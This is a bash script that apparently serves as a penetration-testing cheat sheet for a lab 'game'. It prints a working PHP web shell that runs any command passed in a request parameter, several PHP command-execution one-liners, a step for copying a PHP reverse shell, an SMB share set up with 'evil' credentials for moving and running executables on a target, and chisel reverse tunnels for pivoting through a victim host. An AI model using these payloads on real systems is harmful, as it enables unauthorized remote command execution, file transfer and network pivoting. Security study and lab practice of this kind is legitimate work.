#!/bin/bash

# display common commands that are needed during the game

Frame='\033[0;32m'   # Green
Link='\033[0;35m'  	 # Purple
Title='\033[1;33m' 	 # Bold Yellow
Comment='\033[0;36m' # Cyan
End='\033[0m'		 # No Color
Point='\033[0;31m[*]\033[0m'

ip=$(/sbin/ip -o -4 addr list tun0 | awk '{print $4}' | cut -d/ -f1) 2>/dev/null
if [ "$ip" == "" ]; then
	ip=$(/sbin/ip -o -4 addr list eth0 | awk '{print $4}' | cut -d/ -f1)
fi

echo -e "${Frame}###${End} ${Title}Web Enum & Exploit${End} ${Frame}###${End}"
echo -e "${Point} PHP backdoor"
echo -e "<?php"
echo -e "if(isset(\$_REQUEST['cmd'])){"
echo -e "    echo \"<pre>\";"
echo -e "    \$cmd = (\$_REQUEST['cmd']);"
echo -e "    system(\$cmd);"
echo -e "    echo \"</pre>\";"
echo -e "    die;"
echo -e "}"
echo -e "?>"
echo -e ""
echo -e "${Point} PHP command execution script"
echo -e "<?php exec('id'); ?>"
echo -e "<?php system('id'); ?>"
echo -e "<?php passthru('id'); ?>"
echo -e "<?php shell_exec('id'); ?>"
echo -e ""
echo -e "${Point} PHP reverse shell"
echo -e "cp /usr/share/webshells/php/php-reverse-shell.php ."
echo -e ""


echo -e "${Frame}###${End} ${Title}Fire up server${End} ${Frame}###${End}"
echo -e "${Point} sudo python3 -m http.server 80 --directory ."
echo -e "${Point} impacket-smbserver share . -username evil -password evil -smb2support"
echo -e "    net use Z: \\\\\\$ip\share /u:evil evil"
echo -e "    copy Z:\\\kali_to_target.exe"
echo -e "    copy target_to_kali.txt Z:\\"
echo -e "    \\\\\\$ip\\\share\\\file.exe ${Comment}# run executable${End}"
echo -e "    net use Z: /delete"
echo -e ""


echo -e "${Frame}###${End} ${Title}Port Tunneling${End} ${Frame}###${End}"
echo -e "${Link}https://github.com/jpillora/chisel/releases/tag/v1.7.7${End}"
echo -e "${Point} chisel server -p 10000 --reverse ${Comment}# fire up a chisel server normally on the kali machine${End}"
echo -e "    chisel client \$server_ip:10000 R:\$port:127.0.0.1:\$port ${Comment}# forward localhost \$port on client to server (kali_\$port <---> victem_\$port)${End}"
echo -e "    chisel client \$server_ip:10000 R:\$port:\$internal_node:\$port ${Comment}# forward internal node \$port on client to server (kali_\$port <--victem--> internal_node_\$port)${End}"
echo -e "    chisel client \$server_ip:10000 R:socks ${Comment}# forward traffics on client to server through proxy (kali <--victem--> internal_domain)${End}"
echo -e ""

echo -e ""

